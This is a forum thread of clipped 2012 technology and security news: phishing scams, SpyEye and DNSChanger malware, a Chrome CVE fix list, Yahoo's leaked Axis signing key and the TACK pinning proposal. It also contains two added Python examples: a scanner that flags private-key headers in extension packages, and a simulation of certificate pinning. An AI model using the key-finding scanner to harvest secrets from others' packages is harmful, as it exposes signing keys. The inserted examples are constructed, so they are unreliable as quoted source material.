“If not, please click here, or log on to [Link] so we can protect your account from potential fraud. Thank you for your Cardmembership,” it continues.

Internauts who make the mistake of clicking on the link are taken to a site on which a “Please wait page is loading” alert is displayed. While the page is apparently being fetched, the victim is redirected to another domain that hosts the infamous exploit kit.

More at :-
http://news.softpedia.com/news/American-Express-Ca...

--
mogs CClip 108
Expert Contributor 22nd May, 2012 10:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Monday, May 21, 2012 | 17:29
Labels: Dev updates
The Dev channel has been updated to 21.0.1145.0 for Windows, Mac and Linux platforms.

All
- Updated V8 - 3.11.3.0
- Allow certain unused renderer processes to exit before the tab is closed. (Issue: 126333)
- Fix password autofill to work again for Incognito windows (Issue: 117720)
- Prevent an infinite loop inside SSLClientSocketNSS::OnSendComplete. This has been observed in Chrome OS, but could also happen on other platforms. (Issue: 127822)

Known Issues
- In bookmark bubble unable to edit the name and select the sub folder from drop down (Issue: 128612)

More details about additional changes are available in the svn log of all revisions.

You can find out about getting on the Dev channel here: http://dev.chromium.org/getting-involved/dev-chann...

If you find new issues, please let us know by filing a bug at http://code.google.com/p/chromium/issues/entry

Karen Grunberg
Google Chrome

--
mogs CClip 109
Expert Contributor 22nd May, 2012 12:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
New Tumblr Phishing Scheme Uses Old Login Page

Tumblr users are advised to be careful who they become friends with and what links they click on, especially if they’re posted by a customer whose only messages read “follow me, I follow back.”

That’s exactly how the latest Tumblr phishing campaign begins. A shady user starts following random individuals, urging them to visit a link, GFI’s Jovi Umawing reports.

In the scenario presented by the expert, the link looks like wild-atrocisity.tumblr.com. This URL actually hides an IP address from which users are redirected to a webpage that replicates the Tumblr login page.

At this point, potential victims may believe that they were somehow signed out and they might enter their usernames and passwords. By doing so, they’re actually handing over their login credentials to the masterminds that run the malicious page.

However, there’s one major clue that hints to the fact that this is nothing but a scam. The phishing site actually replicates the old Tumblr login page, not the new and more secure one.

More at :-
http://news.softpedia.com/news/New-Tumblr-Phishing...

--
mogs CClip 110
Expert Contributor 22nd May, 2012 12:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft admits Windows 8 redesign a ‘bet on the future of computing’
by Dan Worth
Microsoft has admitted its Windows 8 redesign is a "bet on the future of computing" in a detailed insight into the thought processes behind the drastic revamp of its operating system.
In a blog post Windows president Steven Sinofsky said the system had been developed around several converging computing trends, including touch, the use of applications and the demand for instant information from users of web-connected devices.
"The new Windows 8 user experience is no less than a bet on the future of computing, and stakes a claim to Windows' role in that future," he said.
"We tried to break new ground in imagining how using a PC might become a fluid and enjoyable experience, how apps might work together to simplify the tasks you do every day, and how a single screen could bring together everything into one always up-to-date place."
Sinofsky said that the rising demand for touch-based devices was a huge new area that the Windows 8 system can meet.
"For an increasingly large number of people over time, it will be the primary way they interact with Windows. And for the vast majority of users, it will eventually be used alongside mouse and keyboard to complete their experience," he said.
Sinofsky also acknowledged that feedback to the Consumer Preview version of the operating system launched earlier this year had been mixed. However, he said the purpose of the launch had been to listen to user feedback and the firm was confident that over time users would adapt to the new platform.

More at :-
http://www.v3.co.uk/v3-uk/news/2178429/microsoft-a...

--
mogs CClip 111
Expert Contributor 22nd May, 2012 12:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft service makes research a social affair
May 22, 2012
An "experimental" project by Microsoft to mix online social networking and academic research was open to the public on Monday.
The Redmond, Washington-based software colossus invited anyone to join its Internet community at so.cl, which was pronounced "social."
"So.cl is an experimental research project, developed by Microsoft's FUSE Labs, focused on exploring the possibilities of social search for the purpose of learning," a frequently-asked-questions page at the website said.
"So.cl combines social networking and search to help people find and share interesting Web pages in the way students do when they work together."
The online community had previously only welcomed students studying information and design at select US universities.
As of Monday, those interested in getting involved with the social network were invited to send messages to socl@microsoft.com.

Read more at :-
http://phys.org/news/2012-05-microsoft-social-affa...

--
mogs CClip 112
Expert Contributor 22nd May, 2012 21:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Windows Vista infection rates climb, says Microsoft
End of support last year for SP2 responsible for spike in successful attacks

By Gregg Keizer
May 22, 2012 01:29 PM ET
Computerworld - Microsoft said last week that a skew toward more exploits on Windows Vista can be attributed to the demise of support for the operating system's first service pack.

Data from the company's newest security intelligence report showed that in the second half of 2011, Vista Service Pack 1 (SP1) was 17% more likely to be infected by malware than Windows XP SP3, the final upgrade to the nearly-11-year-old operating system.

That's counter to the usual trend, which holds that newer editions of Windows are more secure, and thus exploited at a lower rate, than older versions like XP. Some editions of Windows 7, for example, boast an infection rate half that of XP.

Tim Rains, the director of Microsoft's Trustworthy Computing group, attributed the rise of successful attacks on Vista SP1 to the edition's retirement from security support.

"This means that Windows Vista SP1-based systems no longer automatically receive security updates and helps explain why there [was] a sudden and sharp increase in the malware infection rate on that specific platform," said Rains in a blog post last week.

Microsoft stopped delivering patches for Vista SP1 in July 2011. For the bulk of the reporting period, then, Vista SP2 users did not receive fixes to flaws, including some that were later exploited by criminals.

Vista SP2 will continue to be patched until mid-April 2017.

Read more at :-
http://www.computerworld.com/s/article/9227384/Win...

--
mogs CClip 113
Expert Contributor 22nd May, 2012 21:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Banking malware spies on victims by hijacking webcams, microphones, researchers say
The SpyEye variant secretly films and records what victims say and do when they are being defrauded

By Lucian Constantin
May 22, 2012 12:07 PM ET
IDG News Service - A new variant of SpyEye malware allows cybercriminals to monitor potential bank fraud victims by hijacking their webcams and microphones, according to security researchers from antivirus vendor Kaspersky Lab.

SpyEye is a computer Trojan horse that specifically targets online banking users. Like its older cousin, Zeus, SpyEye is no longer being developed by its original author, but is still widely used by cybercriminals in their operations.

SpyEye's plug-in-based architecture allows third-party malware developers to extend its original functionality, Kaspersky Lab malware researcher Dmitry Tarakanov said in a blog post on Monday. This is exactly what happened with the new webcam and microphone spying feature, which is implemented as a SpyEye plug-in called flashcamcontrol.dll, Tarakanov said.

More at :-
http://www.computerworld.com/s/article/9227387/Ban...

--
mogs CClip 114
Expert Contributor 22nd May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Tuesday, May 22, 2012 | 09:15
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.11 for Windows, Mac, Linux, and Chrome Frame. This build contains several bug and stability fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 115
Expert Contributor 22nd May, 2012 21:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Paysafecard PINs Sold Over The Internet Linked To Fraud
22 May, 2012

Scammers are taking advantage of the payment method's customers.

Paysafecard PINs sold over the Internet are increasingly being linked to fraud, the Vienna-based company warns.

The electronic payment method billed as "cash for the Internet" uses a pre-paid system and does not require debit or credit cards. The service, which is regulated in the UK by the Financial Services Commission, aims to function like cash instead.

Customers can purchase secure 16-digit PINs, printed on the back of a card or voucher, from one of 350,000 official sales outlets worldwide, and then spend that money at any of 3,500 authorised online shops, many of which are gaming-related.

But there is a growing trend of PINs being sold over the Internet for sums below their actual value, a practice that violates Paysafecard's terms and conditions. The overwhelming majority of these are fraudulent, with users discovering the cards have previously been used or locked only while attempting to redeem them.



Read more: http://www.itproportal.com/2012/05/22/paysafecard-...

--
mogs CClip 116
Expert Contributor 22nd May, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft's Rozzle bolsters drive-by malware defences
Microsoft researchers have shown off a new anti-malware tool which could be used to defeat so-called drive-by attacks, where users' computers are infected without them actively installing rogue software.
Drive-by attacks typically rely on vulnerabilities in JavaScript but are near-impossible for traditional static and runtime anti-malware tools to detect, according to the researchers.
These JavaScript attacks typically target specific browsers running certain plugins. Unless the malware detects that specific set up, the trap will not be sprung, which makes it hard to detect.
But Benjamin Livshits and Benjamin Zorn of Microsoft Research, along with Clemens Kolbitsch from the Technical University of Vienna have devised a virtual machine tool, known as Rozzle [PDF], which dramatically improves detection of the JavaScript threats.
Rozzle is a JavaScript virtual machine that can simultaneously mimic different set-ups by presenting the malware with multiple execution paths, increasing the likelihood that it can be detected. In effect, it provides a tool to decloak this hidden JavaScript malware.

Read more at :-
http://www.v3.co.uk/v3-uk/news/2178656/microsofts-...

--
mogs CClip 117
Expert Contributor 23rd May, 2012 12:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Social media off to war with propaganda posts

Disinformation campaigns will start with NSFW honeypots
By Simon Sharwood, APAC Editor

Posted in Security, 22nd May 2012 20:15 GMT
Social media posts which lure readers with the promise of illegal, amoral or forbidden products and services may become a cold war cyber weapon, according to Kaspersky Labs CEO Eugene Kaspersky.

Speaking to The Register in Sydney yesterday Kaspersky said the usual suspects – Duqu, Stuxnet, whatever happened in Estonia and the regular data deletions apparently plaguing Iran – are all jolly good examples of cyberwar in action, but require a concerted effort.

Easier-to-execute attacks, he believes, will be fought through dodgy posts to social networks.

Kaspersky’s theory is that states will create handles on social networks that initially post information about illegal (dodgy downloads or drugs), amoral (smut) or forbidden products (drugs again) in order to attract an audience. Once followers or friends have been won, the feeds will turn to dispensing propaganda. Messages of this sort won’t be explicit, Kaspersky said, but will instead represent an attempt at mass manipulation.

More at :-
http://www.theregister.co.uk/2012/05/22/social_med...

--
mogs CClip 118
Expert Contributor 23rd May, 2012 13:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
'Do Not Track' system rapped over lack of renown
by James Dohnert
The effectiveness of user privacy system, 'Do Not Track' (DNT) has been questioned by a prominent security expert, who argued that lack of user awareness is undermining the system.
The warning came from SANS Institute chief research officer Johannes Ullrich. He said that the lack of user awareness and requirement to opt-in nature would limit the DNT system.
DNT allows for users to opt out of tracking by various internet sites, including analytics services, advertising networks, and social platforms. By enabling a special HTML header in their browser preferences, users can request that sites refrain from tracking their activity.
Despite its support in internet browsers such as Firefox, Internet Explorer and Safari, DNT has yet to be adopted by many third-party websites. Experts believe the initiative is being held back because of its voluntary nature and lack of consumer awareness.
"There is no technical means to enforce use of the DNT header. Some legal protections are in the works, but as usual they will probably only apply to legitimate advertisers who are likely going to comply," Ullrich said in a blog post.

More at :-
http://www.v3.co.uk/v3-uk/news/2178857/expert-outl...

--
mogs CClip 119
Expert Contributor 23rd May, 2012 13:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Malware Attacks On The Rise, Says McAfee
23 May, 2012
The security company warns that threats to desktop and mobile operating systems are increasing.

PC malware is higher than it has ever been in the last four years, McAfee revealed in a threat report covering the first quarter of 2012.

Despite previous reports citing Android as a primary target, McAfee researchers now warn that PC and laptop users are not off the hook. Between 2011 and the end of the first quarter of 2012, McAfee Labs traced some 83 million examples of malware, most instances of which were rootkits or password stealers.

The report also found that malware targeting Apple's desktop operating system has shown consistent growth, with a slight increase in the number of samples reported by the end of March.

Though McAfee suggests desktop and laptop users should beware, mobile operating systems continue to be victims to attacks.

Read more: http://www.itproportal.com/2012/05/23/malware-atta...

--
mogs CClip 120
Expert Contributor 23rd May, 2012 21:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 23rd May, 2012 21:06
Google warns users infected with DNSChanger as Web outage nears
Infected PCs and Macs trigger unusual warning on Google's search site

By Gregg Keizer
May 23, 2012 06:36 AM ET
Computerworld - Google on Tuesday hauled out a tool it last used nearly a year ago to warn users infected with the "DNSChanger" malware.

Starting Tuesday, special messages will be displayed at the top of a Google search results page to people whose Windows PCs and Macs have been infected with malicious code that hijacks their clicks.

"Our goal with this notification is to raise awareness of DNSChanger among affected users," said Damian Menscher, a Google security engineer, in a post to a company blog. "We believe directly messaging affected users on a trusted site and in their preferred language will produce the best possible results."

One security expert appreciated Google's effort.

"Let's face it, Google is basically a central piece of infrastructure now, and as such they have a responsibility to do their part to keep the pipes clean," said Andrew Storms, director of security operations at nCircle Security.

DNSChanger silently redirects clicks by modifying victimized computers' domain name system (DNS) settings. The users are sent to hacker-created websites that resemble the real domains.

More at :-
http://www.computerworld.com/s/article/9227397/Goo...

--
mogs CClip 121
Expert Contributor 23rd May, 2012 21:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 23rd May, 2012 21:14
Three Million UK Individuals Targeted By HMRC Scam
23 May, 2012

Forged emails posing as HMRC aim to capitalise on those expecting payouts this year.

Antivirus company Bitdefender has detected a scam targeting three million people expecting tax refunds in the UK, via emails impersonating an officer of HM Revenue & Customs.

The emails include the HMRC logo at the top and are entitled ‘NOTICE OF TAX RETURN FOR YEAR 2011’. It usually states that the recipient is owed a tax rebate of £209.87, with forms attached to complete the claim.

The phishing scam's aim is to collect sensitive authentication data to people's credit card or bank details from the completed form. Cyber criminals would thus have the vital information required for identity fraud and the emptying of victims' bank accounts.



Read more: http://www.itproportal.com/2012/05/23/three-millio...

--
mogs CClip 122
Expert Contributor 23rd May, 2012 21:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows XP update fails in infinite .NET patch loop

UPDATE: MSFT slow to publicise fix for faulty patch
By Simon Sharwood, APAC Editor

Posted in CIO, 23rd May 2012 00:00 GMT
Microsoft has issued guidance on how to fix problems created by its last bunch of patches.

Redmond's patches for May brought pain to Windows XP users who have installed the .NET framework.

The problem seems to involve updates KB2633880, KB2518864 and KB2572073. Each downloads the updates and installs them, but then insists on downloading them again.

A post to this Microsoft Answers thread says the bug affected a user as follows:

My PC says they installed successfully but as soon as I complete the installation they are back on my task bar waiting to be installed again.

Microsoft's guidance on how to address the issue can be found here and is dated as last having been reviewed on May 18th.

Read more at :-
http://www.theregister.co.uk/2012/05/23/windows_xp...

--
mogs CClip 123
Expert Contributor 23rd May, 2012 21:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Website address 'revolution' back in motion
by Glenn Chapman
The Internet domain name "revolution" was back in action on Tuesday with the agency in charge of website addresses once again taking applications for online neighborhoods breaking the ".com" mold.
The Internet Corporation for Assigned Names and Numbers (ICANN) had put the process on hold after discovering a flaw that let some aspiring applicants peek at unauthorized information at the registration website.
"During the last few weeks, we have fixed the technical glitch that caused us to take the system offline," ICANN chief operating officer Akram Atallah said in a message at the agency's website.
The window for applying will remain open until the end of May 30 based on GMT time.
Those interested in running new generic top-level domains (gTLDs) online were assured the problem was fixed and that they could securely apply.
"We recognize and regret the inconvenience caused by this glitch," Atallah said.
In January, ICANN began taking applications from those interested in operating Internet domains that replace endings such as .com or .org with nearly any acceptable words, including company, organization or city names.
Outgoing ICANN president Rod Beckstrom has championed the change as a "new domain name system revolution."

More at :-
http://phys.org/news/2012-05-website-revolution-mo...

--
mogs CClip 124
Expert Contributor 24th May, 2012 10:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome Stable Channel Update
Wednesday, May 23, 2012 | 15:15
Labels: Stable updates
The Chrome Stable channel has been updated to 19.0.1084.52 on Windows, Mac, Linux and Chrome Frame.

Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[117409] High CVE-2011-3103: Crashes in v8 garbage collection. Credit to the Chromium development community (Brett Wilson).
[118018] Medium CVE-2011-3104: Out-of-bounds read in Skia. Credit to Google Chrome Security Team (Inferno).
[$1000] [120912] High CVE-2011-3105: Use-after-free in first-letter handling. Credit to miaubiz.
[122654] Critical CVE-2011-3106: Browser memory corruption with websockets over SSL. Credit to the Chromium development community (Dharani Govindan).
[124625] High CVE-2011-3107: Crashes in the plug-in JavaScript bindings. Credit to the Chromium development community (Dharani Govindan).
[$1337] [125159] Critical CVE-2011-3108: Use-after-free in browser cache. Credit to “efbiaiinzinz”.
[Linux only] [$1000] [126296] High CVE-2011-3109: Bad cast in GTK UI. Credit to Micha Bartholomé.
[126337] [126343] [126378] [127349] [127819] [127868] High CVE-2011-3110: Out of bounds writes in PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[$500] [126414] Medium CVE-2011-3111: Invalid read in v8. Credit to Christian Holler.
[127331] High CVE-2011-3112: Use-after-free with invalid encrypted PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[127883] High CVE-2011-3113: Invalid cast with colorspace handling in PDF. Credit to Mateusz Jurczyk of the Google Security Team, with contributions by Gynvael Coldwind of the Google Security Team.
[128014] High CVE-2011-3114: Buffer overflows with PDF functions. Credit to Google Chrome Security Team (scarybeasts).
[$1000] [128018] High CVE-2011-3115: Type corruption in v8. Credit to Christian Holler.

Many of these bugs were detected using AddressSanitizer.

Full details about what changes are in this release are available in the SVN revision log. If you find a new issue, please let us know by filing a bug.


Anthony Laforge
Google Chrome

--
mogs CClip 125
Expert Contributor 24th May, 2012 10:48
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Windows 8 puts end to endless reboots
OS kicks out to recovery tools after second boot failure

By Gregg Keizer

Computerworld - Microsoft yesterday promised that a feature it's added to Windows 8 will put a stop to endless reboots.

Unlike earlier versions, Windows 8 will automatically call up a new menu with repair and recovery options when the software sniffs out problems getting the machine to boot or the OS to load properly.

In a post to the Building Windows 8 blog Tuesday, Chris Clark, a program manager with the User Experience team, described new tools embedded in the operating system designed to step in when a PC reboots more than twice because of problems.

Although Clark couched the changes as necessary because of increasingly-fast boot times -- meaning users are often unable to interrupt the process with traditional key presses like F2 or F8 -- one side effect is that endless reboots should be a thing of the past.
The problem has plagued Windows at times.

In 2008, an update to prep machines for the release of Vista Service Pack 1 (SP1) crippled PCs when it sent them into an endless cycle of rebooting.

More at :-
http://www.computerworld.com/s/article/9227411/Win...

--
mogs CClip 126
Expert Contributor 24th May, 2012 10:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle slammed for outdated approach to Java security
by Shaun Nichols
Oracle has fallen dangerously behind the times with the security policies and practices it utilises on its Java platform, according to one of Kaspersky Lab's top researchers.
Roel Schouwenberg, a senior antivirus researcher with the Kaspersky Lab global research and analysis team told V3 that Oracle has not kept pace with the security advances made by other companies in recent years.
"You can see that Microsoft has gone to sandboxing for Office, Adobe has gone that way, Google has gone that way with Chrome," Schouwenberg noted.
"When you look at what Oracle has done, the sad reality is nothing. And I have to ask why we are letting Oracle get away with this?"
According to figures from Kaspersky, Java remains a top target for malware writers and cyber criminals. Along with Adobe Reader and Flash, Java vulnerabilities are the most popular for online exploits which lead to malware infections.

More at :-
http://www.v3.co.uk/v3-uk/news/2179375/researcher-...

--
mogs CClip 127
Expert Contributor 24th May, 2012 21:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Yahoo! leaks! private! key! in! Axis! Chrome! debut!

Extension launch scuppered by certificate blunder
By Richard Chirgwin

Posted in Enterprise Security, 24th May
Yahoo! today released its Axis extension for Chrome – and accidentally leaked its private security key that could allow anyone to create malicious plugins masquerading as official Yahoo! software.

Australian entrepreneur Nik Cubrilovic, who last year garnered notice for identifying Facebook's tracking cookies, revealed the certificate blunder on his blog, and said users should not install the extension “until the issue is clarified”.

Cubrilovic peeked into the extension’s source code and found the private certificate, which Yahoo! uses to sign the application to prove it is genuine and unaltered. The result, he says, is that a miscreant could forge a malicious extension that would be verified by Google's web browser as coming from Yahoo!

More at :-
http://www.theregister.co.uk/2012/05/24/yahoo_ship...

--
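A pre-release check for the kind of blunder reported in CClip 127, added here as an example and not taken from the post, the article or any vendor's tooling. It assumes the extension package is a zip-format archive; the file names and key bodies are constructed.

```python
import io
import re
import zipfile

# PEM armour for private keys (PKCS#8, RSA, EC, encrypted and OpenSSH variants).
PRIVATE_KEY_MARKER = re.compile(rb"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")


def find_private_keys(package_bytes: bytes):
    """Return (member name, line number, marker) for every private-key header in the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as package:
        for info in package.infolist():
            if info.is_dir():
                continue
            # Members are compressed, so read each one instead of searching the archive bytes.
            data = package.read(info)
            for match in PRIVATE_KEY_MARKER.finditer(data):
                line = data.count(b"\n", 0, match.start()) + 1
                findings.append((info.filename, line, match.group().decode("ascii")))
    return findings


def release_gate(package_bytes: bytes) -> bool:
    """True only when the package carries no private key and may be published."""
    return not find_private_keys(package_bytes)


def build_sample_package(include_signing_key: bool) -> bytes:
    """Constructed extension-like archive; every name and body here is made up."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("manifest.json", '{"name": "sample-extension", "version": "1.0"}')
        package.writestr("background.js", "// constructed script\nconsole.log('ready');\n")
        # A public key is fine to ship and must not trip the gate.
        package.writestr(
            "keys/update.pub",
            "-----BEGIN PUBLIC KEY-----\nCONSTRUCTED\n-----END PUBLIC KEY-----\n",
        )
        if include_signing_key:
            package.writestr(
                "build/signing.pem",
                "# left over from the build\n"
                "-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED\n"
                "-----END RSA PRIVATE KEY-----\n",
            )
    return buffer.getvalue()


if __name__ == "__main__":
    for label, flag in (("clean build", False), ("build with signing key", True)):
        package = build_sample_package(flag)
        print(label, "->", "publish" if release_gate(package) else find_private_keys(package))
```
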
mogs CClip 128
Expert Contributor 24th May, 2012 22:00
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 to Run Adobe Flash Only on Some Websites
By Ian Paul, PCWorld May 24, 2012 5:42 AM

The touch-centric Metro version of Internet Explorer 10 in Windows 8 is plug-in free, but the browser may still be able to run Adobe Flash video, according to an online report. Microsoft is reportedly taking the Google Chrome approach with IE10 and building Flash capability directly into the touch-friendly browser. But Flash won't be available for every site on the Web in Metro IE10. Instead, Microsoft will only extend the capability to select popular sites, according to Windows bloggers Paul Thurrott and Rafael Rivera.

Read more at :-
http://www.pcworld.com/article/256148/windows_8_to...

--
mogs CClip 129
Expert Contributor 25th May, 2012 09:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 25th May, 2012 09:14
Beta Channel Update
Thursday, May 24, 2012 | 17:15
Labels: Beta updates

The Beta channel has been updated to 20.0.1132.17 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to v8 (3.10.8.10) and fixes for bugs and stability. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 130
Expert Contributor 25th May, 2012 10:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Researchers propose TLS extension to detect rogue SSL certificates
TACK TLS extension combines public key pinning with self-generated keys to validate SSL certificates

By Lucian Constantin

IDG News Service - A pair of security researchers have proposed an extension to the Transport Layer Security (TLS) protocol that would allow browsers to detect and block fraudulently issued SSL certificates.

Called TACK, short for Trust Assertions for Certificate Keys, the extension was developed by security researchers Trevor Perrin and Moxie Marlinspike and was submitted for consideration to the Internet Engineering Task Force (IETF), the body in charge of TLS, on Wednesday.

TACK tries to resolve the trust-related problems with the public key infrastructure that were highlighted by last year's security breaches at certificate authorities (CAs) Comodo and Diginotar.

Both of those breaches resulted in SSL certificates for high profile domains like google.com, hotmail.com or mail.yahoo.com, being issued fraudulently. In Diginotar's case, the certificates were even employed in active attacks against Google users in Iran.

At the moment, Web browsers trust over 600 organizations from around the world to issue SSL certificates. These organizations are known as certificate authorities and every one of them can technically issue a valid certificate for any domain on the Internet.

Several proposals to improve the current CA-based system have been put forward by Internet and security experts in the past 12 months, but there's no consensus regarding which one offers the best solution.

In November 2011, security engineers from Google proposed an HTTP extension called "public key pinning" that would allow websites to effectively tell browsers via an HTTP header which certificate authorities should be trusted to issue SSL certificates for their domain names.

The browsers would then remember (pin) this information and refuse to establish the connection if they receive a certificate signed by a different CA in the future. A more static implementation of this system already exists in Google Chrome for particular domain names, including Google's.

TACK is based on the same public key pinning concept, but instead of pinning CA public keys to particular domain names, it pins public keys generated by the domain owners themselves.

Read more at :-
http://www.computerworld.com/s/article/9227481/Res...

--
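The pin-and-refuse behaviour described in CClip 130, modelled as an added example that is not part of the original post or of either proposal's code. It covers the CA-key pinning variant only; the SHA-256 fingerprint, the `PinStore` class, the host name and all key bytes are assumptions constructed for illustration.

```python
import hashlib
from dataclasses import dataclass


def key_pin(public_key: bytes) -> str:
    """Fingerprint a public key; SHA-256 over the raw bytes is this example's choice."""
    return hashlib.sha256(public_key).hexdigest()


@dataclass(frozen=True)
class PinRecord:
    pins: frozenset      # fingerprints the site asked the browser to remember
    expires_at: float    # pins lapse after this time so a site can recover from mistakes


class PinStore:
    """Browser-side memory of which issuer keys each host has pinned."""

    def __init__(self, clock):
        self._clock = clock          # injected so the example can simulate time passing
        self._records = {}

    def remember(self, host, chain_keys, advertised_pins, max_age):
        """Store advertised pins, but only if this connection already satisfies them."""
        seen = {key_pin(k) for k in chain_keys}
        advertised = frozenset(advertised_pins)
        if not seen & advertised:
            return False             # refuse pins that would lock out the site itself
        self._records[host] = PinRecord(advertised, self._clock() + max_age)
        return True

    def check(self, host, chain_keys):
        """Return 'unpinned', 'ok' or 'pin-violation' for a presented certificate chain."""
        record = self._records.get(host)
        if record is None:
            return "unpinned"
        if self._clock() >= record.expires_at:
            del self._records[host]
            return "unpinned"
        seen = {key_pin(k) for k in chain_keys}
        return "ok" if seen & record.pins else "pin-violation"


# Constructed stand-ins for public keys; real code would hash keys from the TLS handshake.
CA_TRUSTED = b"constructed-key: CA the site actually uses"
CA_OTHER = b"constructed-key: some other browser-trusted CA"
LEAF_2012 = b"constructed-key: site certificate 2012"
LEAF_2013 = b"constructed-key: site certificate after renewal"
LEAF_FORGED = b"constructed-key: certificate the site never requested"


def run_scenarios():
    now = [0.0]
    store = PinStore(clock=lambda: now[0])
    host = "mail.example.test"       # hypothetical host name
    results = {}

    results["before_pinning"] = store.check(host, [LEAF_FORGED, CA_OTHER])
    # A pin set that does not match the live chain is rejected.
    results["bogus_pin_accepted"] = store.remember(
        host, [LEAF_2012, CA_TRUSTED], [key_pin(CA_OTHER)], max_age=3600)
    results["pin_accepted"] = store.remember(
        host, [LEAF_2012, CA_TRUSTED], [key_pin(CA_TRUSTED)], max_age=3600)

    results["same_cert"] = store.check(host, [LEAF_2012, CA_TRUSTED])
    results["renewed_cert_same_ca"] = store.check(host, [LEAF_2013, CA_TRUSTED])
    results["forged_cert_other_ca"] = store.check(host, [LEAF_FORGED, CA_OTHER])
    # Limit of pinning a CA key: a forged certificate from the pinned CA still passes.
    results["forged_cert_pinned_ca"] = store.check(host, [LEAF_FORGED, CA_TRUSTED])

    now[0] = 3600.0                  # pin lifetime has elapsed
    results["after_expiry"] = store.check(host, [LEAF_FORGED, CA_OTHER])
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:24} {outcome}")
```

The `forged_cert_pinned_ca` case is the gap that pinning a key generated by the domain owner, as the article says TACK does, is meant to close.
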
mogs CClip 131
Expert Contributor 25th May, 2012 10:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
NMap 6.0 arrives

Fyodor’s finest since 2009
By Simon Sharwood, APAC Editor

Posted in Security, 25th May 2012 07:15 GMT
Popular open source network discovery and security auditing tool Nmap has reached version 6.0.

The new code hit the Net last Monday, complete with a message from coder Gordon Lyon, aka Fyodor, that the new version represents “almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009.”

Fyodor recommends all users upgrade to the new version, so they can get their hands on 289 new scripts and a host of new features. The six he rates most important are:

An enhanced scripting engine
Better web scanning
Full IPv6 support
A new Nping tool that can generate all sorts of packets
Improvements to the Zenmap GUI (pictured below)
Faster scanning

http://www.theregister.co.uk/2012/05/25/nmap_6_rel...

--
mogs CClip 132
Expert Contributor 25th May, 2012 10:39
Cookie law: websites must seek consent from this weekend
By Dave Lee
Technology reporter, BBC News

The EU wants to put a stop to tracking cookies logging a user's activity without their knowledge
Friday marks the last working day for UK businesses to prepare their websites for a new law governing the use of cookies.

From Sunday, sites must obtain "informed consent" from visitors before saving cookies on a machine.

Cookies are pieces of personal data stored when users browse the web, sometimes to power advertising.

The Information Commissioner's Office (ICO) is to launch a tool for the public to report non-compliant sites.

It is expected that the vast majority of websites will not be ready in time.

However, the ICO has said it would not take immediate action over non-compliant sites, and would instead offer guidance.

Tracking data
The rules are designed to tackle privacy issues resulting from the growing use of cookies which track users' browsing habits.

The guidelines, set by the EU, mean visitors must be told what cookies are being placed on their machine.

More at :-
http://www.bbc.co.uk/news/technology-18194235

--
mogs CClip 133
Expert Contributor 25th May, 2012 12:18
Microsoft tops Google’s takedown requests

Firm sends half a million notices Google’s way
By Dave Neal
Fri May 25 2012, 09:48
INTERNET SEARCH OUTFIT Google has released its latest transparency report, a list of the takedowns and takedown requesters that it got over the previous year.
The numbers show that of the 1.2 million requests to remove URLs from Google's search results, over half a million came from Microsoft.
Microsoft made 540,000 requests for URL takedowns, aiming them at a range of targets. Google's data shows that it asked that search results linking to a range of wares and filesharing web sites be removed.
